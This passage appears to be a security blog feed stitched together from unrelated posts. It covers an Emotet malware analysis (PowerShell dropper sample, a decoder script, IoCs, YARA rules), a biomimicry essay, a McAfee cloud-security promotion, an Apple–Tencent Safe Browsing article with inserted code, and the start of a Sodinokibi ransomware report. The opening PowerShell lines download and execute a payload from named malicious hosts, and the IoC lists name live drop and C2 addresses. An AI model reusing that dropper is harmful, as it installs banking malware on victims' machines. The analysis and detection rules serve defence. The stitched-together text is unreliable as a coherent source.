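$sites = 'http://xsnonline.us/blogs/4x466v/@http://obbydeemusic.com/aqoeivj4fd/us5htvn/'.Split('@');
foreach ($u in $sites) { try { (New-Object Net.WebClient).DownloadFile($u, $xc0x57b38b2x7); Invoke-Item $xc0x57b38b2x7; break } catch {} }
"""

# Stops at whitespace, quotes, angle brackets and the '@' Emotet uses as a separator.
URL_RE = re.compile(r"https?://[^\s'\"<>@]+", re.IGNORECASE)


def encode_powershell(script: str) -> str:
    """Base64 of UTF-16LE text, the form powershell.exe -EncodedCommand expects."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_powershell(blob: str) -> str:
    """Inverse of encode_powershell; tolerates padding stripped by a loader."""
    blob = blob.strip()
    blob += "=" * (-len(blob) % 4)
    return base64.b64decode(blob).decode("utf-16-le")


def extract_urls(script: str) -> List[str]:
    """Unique URLs in first-seen order."""
    found: List[str] = []
    for url in URL_RE.findall(script):
        if url not in found:
            found.append(url)
    return found


def defang(url: str) -> str:
    """http://host.tld/p -> http[://host[.tld/p, the style of the IoC list."""
    scheme, _, rest = url.partition("://")
    host, slash, path = rest.partition("/")
    return f"{scheme}[://{host.replace('.', '[.')}{slash}{path}"


def urls_from_encoded_command(blob: str) -> List[str]:
    """Decode a -EncodedCommand blob and return its URLs, defanged for reporting."""
    return [defang(u) for u in extract_urls(decode_powershell(blob))]


if __name__ == "__main__":
    blob = encode_powershell(SAMPLE_SCRIPT)
    print("encoded:", blob[:48] + "...")
    for u in urls_from_encoded_command(blob):
        print(u)
```

In the field the blob comes from the macro’s command line (for instance from a Sysmon process-creation event or the sandbox trace); the decoder above neither fetches the URLs nor runs the script, so it is safe to use on live samples.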

According to VT, the final payload looks like Emotet, a banking trojan that steals credentials, cookies and cryptocurrency wallets. Emotet is also able to read the saved credentials of major browsers such as Chromium-based browsers, Firefox, Opera and Vivaldi, to exfiltrate cookies, and to send the collected victim information back to its command and control. But let’s quickly check it.

Analysis of dropped and executed file (emotet)

Hash: de6a8b8612b5236a18eea1a6a8f53e117d046cf2ad95e079a6715af68f8d2216
Threat: Emotet, data exfiltration
Brief description: dropped and executed by the previous stage
Ssdeep: 3072:2xUIvfl2nnKJFddS2TZGjRurmOEfRtaG/70Jfm4JuLYwO9/+Tl:2lvfUnKJFddhAjYrmOEpzcflQu1+

The dropped file (VT 12/69), grabbed from the drop URLs inside the previous PowerShell script, is an executable packed with custom internal routines that uses several techniques to avoid static and dynamic analysis: it deletes the original file once executed, it resolves an unusually high number of APIs, and it resolves functions dynamically to defeat static analysis.

Emotet Depacked

While running, the analysed sample collects a lot of information about the host machine, obtains the local public IP address by querying an external resource, http[://185[.42[.221[.78:443/whoami.php, and finally pushes that information to the external command and control (please refer to the IoC section for the complete C2 list).

Recorded Information

The sample starts a local service called khmerdefine and ensures its persistence by copying its file into c:\Windows\SysWOW64 and registering a system service set to start automatically. AV detections and plenty of static and network-traffic signatures confirm that we are facing a new encrypted version of the Emotet trojan.

Conclusion

The Emotet gang is getting smarter and smarter in how it delivers its artifacts. This time they addressed companies having an external Security Operation Center (SOC), pretending to be an external SOC operator who sends periodic reports to the company. The delivery vehicle was a Microsoft Word document with heavily obfuscated macros that eventually drops and executes the Emotet malware. The following image represents the compiled MITRE ATT&CK matrix, which qualifies the stages and describes the overall behavior.

MITRE ATT&CK

IoC

email:
grecia@ambientehomedecor.com

Hash:
6125489453c1824da3e28a54708e7c77875e500dd82a59c96c1d1e5ee88dcad7 (.doc)
de6a8b8612b5236a18eea1a6a8f53e117d046cf2ad95e079a6715af68f8d2216 (.exe)

Drop URLs:
http[://xsnonline[.us/blogs/4x466v/
http[://obbydeemusic[.com/aqoeivj4fd/us5htvn/
http[://veeplan[.com/wp-content/dW0o3RoJNG/
http[://wwwkmacobd[.com/u9r/
http[://aijdjy[.com/dup-installer/t0/

C2 (Emotet):
http[://186[.75[.241[.230/cone/loadan/splash/merge/
http[://186[.75[.241[.230/results/json/
http[://186[.75[.241[.230/balloon/json/
http[://186[.75[.241[.230/enable/arizona/splash/merge/
http[://186[.75[.241[.230/acquire/
http[://181[.143[.194.[138:443/health/splash/sess/merge/
http[://85[.104[.59[.244:20/enable/rtm/sess/merge/

Yara Rules

import "pe"

// Second stage: the Emotet executable dropped by the SOC-report document.
// The "pe" module is imported because the condition calls pe.imphash();
// without the import the rule does not compile.
rule EMOTET_SOC_EXE {
   meta:
      description = "Emotet payload dropped and executed by the SOC-report lure (PE)"
      date = "2019-10-13"
      hash1 = "de6a8b8612b5236a18eea1a6a8f53e117d046cf2ad95e079a6715af68f8d2216"
   strings:
      $x1 = "c:\\Users\\User\\Desktop\\2003\\Efential\\Release\\EFENTIAL.pdb" fullword ascii
      $s2 = "EFENTIAL.exe" fullword ascii
      $s3 = "ZNtlsIkbp2bxIIBXLbRtd3e85g7mJ73gSFPnybocDj/xsKVPWxzllXY/FdB150/ewzkkdzDw5VMbiVfS/SPd0FlXp+VqpDpPDXxNH3cc9TXXa53EGeMfGnsPa3chxKVv" ascii
      $s4 = "tblJgbnpgZmZCaHxmfEpoaS9Cb31DfHpZfVJobW5SYG56YGZmQmh8ZnxKaGkvQm99Q3x6WX1SaG1uUmBuemBmZkJofGZ8SmhpL0JvfUN8ell9UmhtblJgbnpgZmZCaHx" ascii /* base64 encoded string 'nR`nz`ffBh|f|Jhi/Bo}C|zY}RhmnR`nz`ffBh|f|Jhi/Bo}C|zY}RhmnR`nz`ffBh|f|Jhi/Bo}C|zY}RhmnR`nz`ffBh|' */
      $s5 = "C9813Hcfx1BkY3VrYVwfB4tWs+/Eb93UVwdvrbdywicNqMdPSiMzJFXbZbSLG6cDA/O9Vy2ob3d3PeVLcie95EpT50oKkSE/8bynT1sLOWCoPxXUd+dPO6BKhHcwzOdT" ascii
      $s6 = "G+MfTPu8J3chkKdvVwmN7R/fNdx3H8cxWUFva2FcHweLIPfrnG/d1FcHb/FxEOQnDajHT0qu26c122W0ixunZpkE2lctqG93dy4Z7jMnveRKU+dp33WJP/G8p09bPG/N" ascii
      $s7 = "RSVloG9h6HM56NP1tCMFZKs69gEEW+JoiOCz9U3uI3uYsb+mL2+97Wf903wpFDCKiBjjtt/TznbwXOcnHS87rh7rG4N2wHiRqPj2AReKM+CICO5NSlNOxut2wHOnb5dY" ascii
      $s8 = "iOC7W7cnZWhtQTw5nu3bSa/eHxvVFB3RfZP9CFkKs3KWazNkXJPk+HTPmTvpWFcnpLn2DUFtp2v1ELP9acqRoKOXIXMJCNtYpiEdTEP7nzdBU8UoA538OfhEk+kUzQrb" ascii
      $s9 = "6RzgkjSOWDNk6FtXIb1gBQ0oTx93sMelCVJYrG9ZEJB07FiwoYhZkKiSkNh3DQweyOCz9UXEmKjkHOXYfeRY2qT4p4UUBtCIA0+o00Fj/JSM4I+AkgRrpYTr7rS9V9wV" ascii
      $s10 = "StOEJiPbZbiKG6dLTcWrVy28bnd3MRHI6Se9+EtT5xnfnbI/8aimT1vHvvS1PxXYdudP5QazN3cw+OZTG6WMoPkj3ehaV6ftpUvyTw1ETh9335+9tGudzBrjH0t/zLV3" ascii
      $s11 = "mQOhiAgYsPyI4DhFgdYtLdGQ1W9Bxmd6m3lnTJcfr4gYGLD8iOA41oOuIaXdCNnnTaphWJ1HYWqR+qqIKBiwmIjgOPiFFCgT1NbQLUTYb0KTUW+UkPeoybBtiGSwewAX" ascii
      $s12 = "Jd812HQfx5Qv5tVrYSAcB4t1CVi1b93QVAdvpSmDyCcNpMRPSpcCbzzbZbCIG6fu/FMSVy20bHd3ShSspye94ElT56m+fUo/8bCkT1t+Me1nPxXQdOdPGL1DQHcw8ORT" ascii
      $s13 = "f64odyFEoG9XrrnC4d81EHAfx9MLlPdrYegYB4s9h95Cb91oUAdvuYg3nCcNHMBPSk5z9mnbZfiNG6fklZhYVy38aXd3FwtmSie9uExT54d2bFE/8eihT1swM44GPxWY" ascii
      $s14 = "G5WtAP8+00dbvQhs6PgZzXSo8WjM1YD2S2wk9prpUJn8oG0I4laYrNKGZTi4kPTVMKbGcImVZllhx5Tj+amkWDhXp2+bKhvFcO9Gasz1gDixo1+XH24Fpyq/01X5aw0b" ascii
      $s15 = "3ie9qEhT593fXyw/8filT1s1hgetPxWodedPR5foK3cwiOVTG/Eyi+Yj3ZhZV6cVyoNtTw00TR93mxbYI2udnBnjHxLYp+x3IZylb1e4qIYS3zXYdR/HAZflQmthIB0H" ascii
      $s16 = "RpFqNpYQapubxqPNu6yDXrsXC6qB7CzF0GzVj0FjbT6RdW15ncWnY7/vh92xHgE5j7MjB9mZ3mVK5FiwlKhYoKj4kIq4A4DduIQLc4bcLK/RsNUFQeBu9pLlbsmemKY/" ascii
      $s17 = "5Ewf7cgaGLAv7VSjeroTTJAjcpy+a7Ql2VPnU2HVntv/mUgzY6rVrB/TYQX35L9Xj+N9SPwkjLT2k+D48S0nWy/tVNKTKO5FA2W4Yy0Mxk9KrCt+b2nse4rmJKmXYRaT" ascii
      $s18 = "5Ewf7cgaGLAv7VSjeroTTJAjcpy+a7Ql2VPnU2HVntv/mUgzY6rVrB/TYQX35L9Xj+N9SPwkjLT2k+D48S0nWy/tVNKTKO5FA2W4Yy0Mxk9KrCt+b2nse4rmJKmXYRaT" ascii // same content as $s17, kept as in the original rule
      $s19 = "iBunjDe9gVct7Gx3d65SQF8nvahJU+cRqKveP/H4pE9bLL3YAz8VqHTnT7v1JHR3MIjkUxv0uwvjI92YWFenoW2yzU8NNEwfd/JCOHlrnZwY4x9adVfbdyGcpG9X8DDB" ascii
      $s20 = "pKjTapsqZ36hVbhZOPU4sD5ekeEYE2WaixuncUK41ZSfp87TA/3tI91r1DvwoBcDoQywknwbTexd6FjAV+2Ac8gY7SPda9RPwKByrBsJvAE05AhPsWyl0KilUwtkCFjk" ascii
   condition:
      // MZ header, plausible size, then either the import hash of the sample or string evidence
      uint16(0) == 0x5a4d and filesize < 800KB and
      ( pe.imphash() == "ffcd1ab4ae5e052202d6af1ea2767498" or ( 1 of ($x*) or 4 of them ) )
}

// First stage: the Word document. It is an OLE2 compound file (magic D0 CF 11 E0,
// hence uint16(0) == 0xcfd0 little-endian), so despite the _PE suffix this rule
// matches the .doc, not an executable.
rule EMOTET_SOC_PE {
   meta:
      description = "SOC-report Word dropper (OLE2 document) delivering Emotet"
      date = "2019-10-13"
      hash1 = "6125489453c1824da3e28a54708e7c77875e500dd82a59c96c1d1e5ee88dcad7"
   strings:
      $x1 = "*\\G{0D452EE1-E08F-101A-852E-02608C4D0BB4}#2.0#0#C:\\windows\\system32\\FM20.DLL#Microsoft Forms 2.0 Object Library" fullword wide
      $x2 = "Customer50041 Keeling Bypass, North Christellefort, Tunisia Global128 Manuel Stravenue, New Nicholasfort, Montserrat" fullword ascii
      $x3 = "*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation" fullword wide
      $x4 = "Forward297 German Trail, West Miloshire, Germany Product44796 Chesley Bypass, East Santos, Antigua and Barbudan" fullword ascii
      $x5 = "Regional1198 Rahsaan Motorway, Klockoburgh, Czech Republic Human326 Olson Bypass, North Nicholaus, Zimbabwe" fullword ascii
      $x6 = "Dynamic6743 Hickle Bypass, West Karliborough, United States Minor Outlying Islands Product6344 Zieme Inlet, Gloverfurt, Taiwan" fullword ascii
      $x7 = "*\\G{3D3F9F38-A9F3-48A3-AE60-38AE7491F39A}#2.0#0#C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\Word8.0\\MSForms.exd#Microsoft Forms" wide
      $s8 = "Central080 Ari Ranch, Port Sarinachester, Saint Vincent and the Grenadines Product4773 Cornelius Ford, Maybelleville, Morocco" fullword ascii
      $s9 = "Senior75970 Kiehn Brook, Port Joaquin, Comoros Forward6656 Parker Extension, Halvorsonton, Zambia" fullword ascii
      $s10 = "6868686868686868686868" ascii /* reversed goodware string '8686868686868686868686' */ /* hex encoded string 'hhhhhhhhhhh' */
      $s11 = "*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft " wide
      $s12 = "Dynamic98251 Karli Mission, Deronhaven, Democratic People's Republic of Korea Chief1365 Hermann Passage, Rickyport, Oman24 " fullword ascii
      $s13 = "Forward0973 Nienow Dam, Walkermouth, Egypt Customer976 MacGyver Mountain, Schoentown, Northern Mariana Islands+ Lo " fullword ascii
      $s14 = "Corporate28089 Etha Bypass, Jastbury, Turkmenistan Dynamic764 Price Cliffs, Welchtown, Algeriaog(1 " fullword ascii
      $s15 = "National4629 Brianne Locks, Port Shadburgh, Bangladesh Forward481 Ashton Course, Lake Judson, Pakistana Pr" fullword ascii
      $s16 = "Forward563 Sasha Mountains, Nitzschestad, Palau Lead58549 Lesch Parkways, Port Archburgh, Burundi" fullword ascii
      $s17 = "Forward00009 Labadie Valley, Lake Othaview, Brunei Darussalam Future796 Fritsch Road, Mertzchester, Montserrat1831 " fullword ascii
      $s18 = "Central9007 Leland Isle, Laurynview, Morocco Product75313 Mueller Harbors, West Nakiafort, Lithuania+ Log( " fullword ascii
      $s19 = "Regional973 Aubrey Squares, South Simoneville, Svalbard & Jan Mayen Islands Dynamic7842 Madilyn Course, O'Harastad, Armenia" fullword ascii
      $s20 = "Lead7617 Nicolas Meadows, West Odell, Saint Pierre and Miquelon Product9412 Stamm Cove, South Katlynnport, Comoros " fullword ascii
   condition:
      // OLE2 header, plausible size, one strong marker plus four supporting strings
      uint16(0) == 0xcfd0 and filesize < 900KB and
      1 of ($x*) and 4 of them
}


Cybersecurity and Biology: Biomimicry and Innovation Inspired by Nature

Since digital systems have been built to, well, mimic the way living systems function and behave (and malware in turn mimics the way a viral infection or disease behaves in real life), cybersecurity and biology have more in common than you’d think. Here’s a fresh look at this congruence through the concept of biomimicry.

When it comes to ecosystems, our information technology ecosystem is very, very young (the global internet, for example, is only about 30 years old). Our planetary ecosystem, however, is well over 3 billion years old.

That’s 3-plus billion years of evolutionary innovation and natural intelligence that has inspired countless breakthroughs in the world of design — and that is now being tapped for game-changing new ideas in the high-stakes world of information security.

So, what can such creatures as the humble ant teach us about cybersecurity? Or for that matter, the chameleon or the Bornean moth?

Cybersecurity and Biology. The Idea of Biomimicry

Welcome to the fertile field of biomimicry which, according to Smithsonian Magazine (“How Biomimicry is Inspiring Human Innovation”), hinges on the notion that “we human beings, who have been trying to make things for only the blink of an evolutionary eye, have a lot to learn from the long processes of natural selection, whether it’s how to make a wing more aerodynamic or a city more resilient or an electronic display more vibrant.”

Or, in the case of cybersecurity, to make information systems and defenses more secure, resilient and adaptable.

The millions of species and organisms that have inhabited this planet far longer than humans have learned to adapt to life on earth uniquely, gracefully and sometimes with astonishing brilliance. As science author and biomimicry expert Janine Benyus put it, “they are our elders” so why not learn as much as we can from their “3.8 billion years of research and development.”

What is Biomimicry? [Several Definitions]


While not a familiar term to all, humankind has used biomimicry from the time we started wearing animal skins for warmth.

“One of the most often-cited examples is Velcro, which the Swiss engineer Georges de Mestral patented in 1955 after studying how burs stuck to his clothes,” according to the Smithsonian report. In other examples, “a fan created by Pax Scientific borrows from the patterns of swirling kelp, nautilus and whelks to move air more efficiently. A saltwater-irrigated greenhouse in the Qatari desert will use condensation and evaporation tricks gleaned from the nose of a camel.”

One of the best and simplest ways to think of biomimicry is “innovation inspired by nature.”

The term is believed to have been coined in 1982 and popularized by Janine Benyus in her 1997 book titled, you guessed it, “Biomimicry: Innovation Inspired by Nature.” Among the countless examples she cites are the Wright brothers, who employed biomimicry by observing pigeons and vultures and using them as inspiration in the creation of the first airplane.

“Our most clever architectural struts and beams are already featured in lily pads and bamboo stems. Our central heating and air-conditioning are bested by the termite tower’s steady 86 degrees F. Our most stealthy radar is hard of hearing compared to the bat’s multifrequency transmission. And our new ‘smart materials’ can’t hold a candle to the dolphin’s skin or the butterfly’s proboscis. Even the wheel, which we always took to be a uniquely human creation, has been found in the tiny rotary motor that propels the flagellum of the world’s most ancient bacteria,” she writes.

“Unlike the Industrial Revolution, the Biomimicry Revolution introduces an era based not on what we can extract from nature, but on what we can learn from her.”

In addition to her books, Benyus has delivered multiple Ted Talks on the topic including: “Biomimicry’s Surprising Lessons From Nature’s Engineers” and “Biomimicry in Action.”

Here is how two of the leading organizations devoted to the study and advancement of biomimicry define the art and science of innovation inspired by nature.

“Biomimicry is an approach to innovation that seeks sustainable solutions to human challenges by emulating nature’s time-tested patterns and strategies.” (Biomimicry.org)

“Biomimicry is learning from and then emulating nature’s forms, processes, and ecosystems to create more sustainable designs.” (Biomimicry.net)

Biomimicry in Cyber Security: Digital Ants to the Rescue


Creating analogies between cybersecurity and biology is not exactly new. Since the very advent of cybersecurity, experts have described the spread of malware in terms borrowed from biology, such as ‘virus’, ‘infection’, ‘epidemic’ and so on. But biomimicry is a more refined and rigorous research field that may be just what cybersecurity approaches need right now for greater focus. A fresh point of view is also always welcome, if only to avoid a monoculture approach.

Some people who are also enthusiastically adopting this blended approach of combining cybersecurity and biology insights are dubbing this bio-cybersecurity. They support the idea that it’s an entirely new field, warranting its own research. While time will tell on whether a new science is born or not, it’s clear that cybersecurity and biology can have a lot to learn from each other.

OK, so what can the humble ant teach us about cybersecurity?

Well, ants are known to work collaboratively to accomplish such tasks as building, defending and repairing their nests. According to a Wall Street Journal article by JR Reagan, global chief information security officer for Deloitte (“The Nature Lover’s Guide to Cyber Security”), cybersecurity researchers are applying this type of “swarm intelligence.”

In one project which beautifully blends cybersecurity and biology, so-called “digital ants” monitor systems for anomalies such as malware. The ants drop “markers” where unusual activity occurs, similar to the pheromonal markers ants place along paths to food. When the markers at a given location exceed a certain threshold, an alarm is triggered to alert human cybersecurity specialists.

Bornean moths and chameleons also possess innate intelligence and capabilities applicable to information security, writes Reagan. The moths, for example, protect themselves from birds by creating leaf tents. Using a similar principle, “data masking” shields sensitive personal information from unauthorized viewers by replacing it with phony data.

The chameleon fools predators by changing colors to blend in with its surroundings, rendering itself nearly invisible. In cybersecurity, a practice called steganography disguises sensitive data to make it look like something else, say a picture of a flower or a music file.

“Borrowing from the natural world to safeguard a virtual one” may seem paradoxical, writes Reagan. “But humans have engaged in biomimicry for eons. … Now, as then, we may find some of the best solutions to our problems on nature’s path.”

Potential cybersecurity and biology combo strategies are also offered by the tale, or rather tail, of the lizard — a creature that easily sheds its tail when attacked in order to protect its more vital organs.

The Harvard Business Review, in an article titled “Defeat Hackers with Biomimicry,” explains how this concept can be adapted to cybersecurity: “There may be sacrificial systems or information you can offer up as a decoy for a cyber-predator, in which case an attack becomes an advantage, allowing your organization to see the nature of the attacker and giving you time to add further security in the critical part of your information infrastructure.”

The belief that biomimicry is crucial to the future of cybersecurity is taken a step further in a piece penned by a biomimicry expert and a cyber CEO. In “Only Biomimicry Will Save Cybersecurity,” Idriss Aberkane and Stuart McClure write that biomimicry may even offer the promise of developing something resembling a virtual immune system.

“Deep learning mimics nature: Looking at the Internet as an organism, we can attempt to copy the way organisms ensure their internal security,” they write. “Tomorrow’s security software will evolve as a predator-prey dynamic system, with each software population acquiring new characteristics until the entire system stabilizes its software diversity the same way an ecosystem stabilizes its biodiversity.”

Finally, while not speaking specifically about biomimicry, another tech visionary also seemed to grasp the potential of applying the study of living organisms to the world of computers (thus blending the best of cybersecurity and biology). Apple founder Steve Jobs once said, “I think the biggest innovations of the 21st century will be at the intersection of biology and technology. A new era is beginning.”

About the Author:

Michelle Moore, Ph.D., is an academic director and adjunct professor for the University of San Diego’s innovative, online Master of Science in Cyber Security Operations and Leadership program. She is also a researcher, author and cybersecurity policy analyst with over two decades of private-sector and government experience as a cybersecurity expert.

The post Cybersecurity and Biology: Biomimicry and Innovation Inspired by Nature appeared first on Heimdal Security Blog.

Defining Cloud Security – Is It the Endpoint, Your Data, or the Environment?

You’ve heard it once; you’ve heard it a hundred times – “secure the cloud.” But what does that phrase mean? On the surface, it’s easy to assume this phrase means using cloud-enabled security products. However, it’s much more than that. Cloud security is about securing the cloud itself through a combination of procedures, policies, and technologies that work together to protect the cloud—from the endpoint to the data to the environment itself. A cloud security strategy must be all-encompassing, based on how data is monitored and managed across the environment. So, let’s examine how IT security teams can address common cloud challenges head-on, while at the same time establishing the right internal processes and adopting the necessary solutions in order to properly secure the cloud.

Cloud Security’s Top Challenges

As we enter a post-shadow IT world, security teams are now tasked with understanding and addressing a new set of challenges—those that can stem from a complex, modern-day cloud architecture. As the use of cloud services grows, it is critical to understand how much data now lives in the cloud. In fact, the amount of sensitive data stored in cloud-based files is only growing, currently standing at 21% after having increased 17% over the past two years. So it’s no wonder that threats targeting the cloud are growing, too: The average organization experiences 31.3 cloud-related security incidents each month, a 27.7% increase over the same period last year.

Frequently hit by data breaches and DDoS attacks, cloud technology is no stranger to cyberthreats. However, it is also affected by challenges unique to its makeup, such as system vulnerabilities and insecure user interfaces (UIs) and application programming interfaces (APIs), all of which can lead to data loss. Insecure UIs and APIs are top challenges for the cloud, because the security and availability of general cloud services depend on the security of those interfaces; if they are insecure, functionality such as provisioning, management and monitoring is affected. There are also bugs within cloud programs that can be used to infiltrate and take control of a system, disrupt service operations and steal data. A further challenge as data and workloads move to the cloud is developers’ insufficient knowledge of how cloud capabilities have evolved. We also find misconfigurations to be one of the major contributors to data leaks and data breaches, which makes cloud configuration assessment another best practice IT should own. Another major source of cloud data loss? Improper identity, credential and access management, which can enable unauthorized access to information via unprotected default installations.

The good news? To combat these threats, there are a few standard best practices IT teams can focus on to secure the modern-day cloud. First and foremost, IT should focus on controls and data management.

Security Starts with Process: Controls and Data Management

To start a cloud security strategy off on the right foot, the right controls for cloud architecture need to be in place. Cloud security controls provide protection against vulnerabilities and alleviate the impact of a malicious attack. By implementing the right set of controls, IT teams can establish a necessary baseline of measures, practices, and guidelines for an environment. These controls can range from deterrent and corrective to preventative and protective.

In tandem with controls, IT teams need to establish a process or system for continually monitoring the flow of data, since insight into data and how it is managed is vital to the success of any cloud security strategy. A solution such as McAfee Data Loss Prevention (DLP) can help organizations monitor data through the use of a management console or dashboard. This tool can help secure data by extending on-premises data loss prevention policies to the cloud for consistent DLP, protecting sensitive data wherever it lives, tracking user behavior, and more.

Solving for Visibility, Compliance, and Data Protection

When it comes to securing data in the cloud, visibility and compliance must be top of mind for IT teams as well. Teams need to gain visibility into the entirety of applications and services in use, as well as have proper insight into user activity to have a holistic view of an organization’s existing security posture. They also need to be able to identify sensitive data in the cloud in order to ensure data residency and compliance requirements are met.

That’s precisely why IT teams need to adopt an effective cloud access security broker (CASB) solution that can help address visibility and compliance issues head-on. What’s more, this type of solution will also help with data security and threat protection by enforcing encryption, tokenization, and access control, as well as detecting and responding to all types of cyberthreats impacting the cloud.

Bringing It All Together

By combining the right controls and data management processes with a CASB solution, security teams can protect the cloud on all levels. A CASB solution like McAfee MVISION Cloud protects data where it lives today, in the cloud. This CASB solution is a cloud-hosted software that sits between cloud service customers and cloud service providers to enforce security, compliance, and policies uniformly across all cloud assets, from SaaS to IaaS/PaaS. Plus, McAfee MVISION Cloud can help organizations extend security controls of their on-premises infrastructure to the cloud and beyond. To extend these controls, this solution detects, protects, and corrects. During detection, IT security teams gain complete visibility into data, context, and user behavior across all cloud services, users, and devices. When data leaves the cloud, McAfee MVISION Cloud applies persistent protection wherever it goes: in or outside the cloud. And when an error does occur, the solution takes real-time action deep within cloud services to correct policy violations due to human error and stops security threats. While McAfee MVISION Cloud protects the cloud itself, it’s also important to protect access to the cloud at the start, or the endpoint. An endpoint security solution, such as McAfee Endpoint Security, is also integral for safeguarding the cloud, since endpoints are a target for credential theft that leads to greater risk in the cloud environment.

In an ever-changing threat landscape, implementation of the proper controls and data management, with the addition of effective cloud security solutions, are the keys to a strong cloud security strategy. By taking into account and working to proactively protect the multitude of endpoints connected to the cloud, the amount of data stored in the cloud, and the cloud environment itself, IT security teams can help ensure the cloud is secure.

To learn more about cloud security and other enterprise cybersecurity topics, be sure to follow us @McAfee and @McAfee_Business.

 

The post Defining Cloud Security – Is It the Endpoint, Your Data, or the Environment? appeared first on McAfee Blogs.

Privacy advocates criticize Apple for sharing some users browsing data with Tencent

New problems for Apple: most of its users are likely unaware that the company is sharing iOS web browsing data on some of them with the Chinese giant Tencent.

The news is worrying. Starting from at least iOS 12.2, Apple has integrated “Tencent Safe Browsing” to improve the security of its users and protect them from fraudulent websites. Tencent Safe Browsing backs the “Fraudulent Website Warning” feature in the Safari web browser for both iOS and macOS, which checks every site users visit.

Apple secure browsing

The service relies on a continuously updated blacklist of malicious websites. The blacklist was initially provided by Google’s Safe Browsing service. In order to prevent users from visiting malicious websites, blacklisting services have to learn something about the websites the user visits, and they may also log the user’s IP address. At this time it is not clear whether Tencent also collects IP addresses of users residing outside China; most likely Tencent’s blacklist is only served to Chinese users, because Google’s services are blocked in the country.

“Before visiting a website, Safari may send information calculated from the website address to Google Safe Browsing and Tencent Safe Browsing to check if the website is fraudulent. These safe browsing providers may also log your IP address,” Apple notes.
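What “information calculated from the website address” means in practice, as an added example (not code from Apple, Google or Tencent): Google’s documented Safe Browsing v4 Update API expands a URL into host-suffix/path-prefix expressions, hashes each with SHA-256 and works with a short hash prefix, contacting the server only for prefixes that hit the locally cached list. Whether Apple’s Tencent integration uses exactly this protocol is an assumption here; the article does not say. The expansion rules below follow Google’s public specification in simplified form (no percent-decoding or other canonicalization of the input URL).

```python
"""Hash-prefix view of a 'safe browsing' lookup.

Added example, not code from the article or from Apple/Google/Tencent. Follows
the documented Google Safe Browsing v4 expression rules; that Safari's Tencent
integration behaves the same way is an assumption.
"""
import hashlib
import ipaddress
from typing import List
from urllib.parse import urlsplit


def host_suffixes(host: str) -> List[str]:
    """Exact host, then up to four suffixes built from the last five labels (never a bare TLD).

    An IP-address host is used as-is.
    """
    host = host.lower().rstrip(".")
    try:
        ipaddress.ip_address(host)
        return [host]
    except ValueError:
        pass
    out = [host]
    tail = host.split(".")[-5:]
    for i in range(len(tail) - 1):  # stop before the single-label TLD
        cand = ".".join(tail[i:])
        if cand not in out:
            out.append(cand)
    return out


def path_prefixes(path: str, query: str) -> List[str]:
    """Exact path with query, exact path, then '/' and up to three directory prefixes."""
    path = path or "/"
    out = [f"{path}?{query}"] if query else []
    out.append(path)
    dirs = path.split("/")[1:-1]  # directory components, file name excluded
    for i in range(0, min(len(dirs), 3) + 1):
        cand = "/" + "/".join(dirs[:i]) + ("/" if i else "")
        if cand not in out:
            out.append(cand)
    return out


def url_expressions(url: str) -> List[str]:
    """All host/path combinations a client hashes for one URL (scheme and port dropped)."""
    parts = urlsplit(url.strip())
    exprs: List[str] = []
    for host in host_suffixes(parts.hostname or ""):
        for path in path_prefixes(parts.path, parts.query):
            if host + path not in exprs:
                exprs.append(host + path)
    return exprs


def hash_prefixes(url: str, prefix_bytes: int = 4) -> List[str]:
    """Hex SHA-256 prefixes of each expression: this, not the URL, is what is compared or sent."""
    return [hashlib.sha256(e.encode("utf-8")).digest()[:prefix_bytes].hex()
            for e in url_expressions(url)]


if __name__ == "__main__":
    url = "http://a.b.c/1/2.html?param=1"  # the example URL from Google's specification
    for expr, prefix in zip(url_expressions(url), hash_prefixes(url)):
        print(f"{prefix}  {expr}")
```

A 4-byte prefix does not name the page outright, and with the Update API the server is only asked about prefixes that matched the local list. The provider nevertheless sees the client’s IP address and the timing of those requests, which is the exposure the article and Apple’s own notice are about.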

Experts fear that Tencent could have access to the same data sent to Google and intelligence experts believe that it could share the same information with the Chinese government.

“Tencent works closely with the Chinese Communist Party. It facilitates government censorship in China through its multi-functional utility app WeChat.” reported the website reclaimthenet.org. “The company also released a game pro-Chinese Communist Party game called Clap for Xi Jinping: An Awesome Speech in 2017 which, as the title suggests, encourages users to virtually clap for the Chinese president Xi Jinping. In addition to this, Tencent is reportedly collaborating with the Chinese Communist Party to develop “patriotic” video games.”

Privacy advocates believe that users have to be notified of major changes of this kind.

The good news is that users can turn off the Fraudulent Website Warning feature in Safari, even though doing so potentially exposes them to online threats.

The feature is enabled by default on iPhone and iPad devices running iOS 13; below are the instructions to disable it:

  • iOS: Settings > Safari > Turn off Fraudulent Website Warning
  • macOS: Safari > Preferences > Security > Uncheck Warn when visiting a fraudulent website

Pierluigi Paganini

(SecurityAffairs – Apple, privacy)

The post Privacy advocates criticize Apple for sharing some users browsing data with Tencent appeared first on Security Affairs.

McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service – Follow The Money

Episode 3: Follow the Money

This is the third installment of the McAfee Advanced Threat Research (ATR) analysis of Sodinokibi and its connections to GandCrab, the most prolific Ransomware-as-a-Service (RaaS) Campaign of 2018 and mid 2019.

The Talking Heads once sang “We’re on a road to nowhere.” This expresses how challenging it can be when one investigates the financial trails behind a RaaS scheme with many affiliates, etc.

However, we persisted, and we prevailed. By linking underground forum posts with bitcoin transfer traces, we were able to uncover new information on the size of the campaign and associated revenue; even getting detailed insights into what the affiliates do with their earnings following a successful attack.

With the Sodinokibi ransomware a unique BTC wallet is generated for each victim. As long as no payment is made, no trace of the BTC wallet will be available on the blockchain. The blockchain operates as a public ledger of all bitcoin transactions that have happened. When no currencies are exchanged, no transactions are recorded. Although many victims hit the news, we understand that if they paid, sharing that with the research community is maybe a bridge too far. On one of the underground forums we discovered the following post:

In this post the actors are expanding their successful activity and offering a 60 percent cut as a start and, after three successful payments by the affiliate (read successful ransomware infections and payments received from the victims), the cut increases to 70 percent of the payments received. This is very common as we saw in the past with RaaS schemes like GandCrab and Cryptowall.

Responding to this post is an actor with the moniker of ‘Lalartu’, and his comments are quite interesting, hinting he was involved with GandCrab. As a side note: ‘Lalartu’ means ‘ghost/phantom’. Its origins are in the Sumerian civilization, where Lalartu was seen as a vampiric demon.

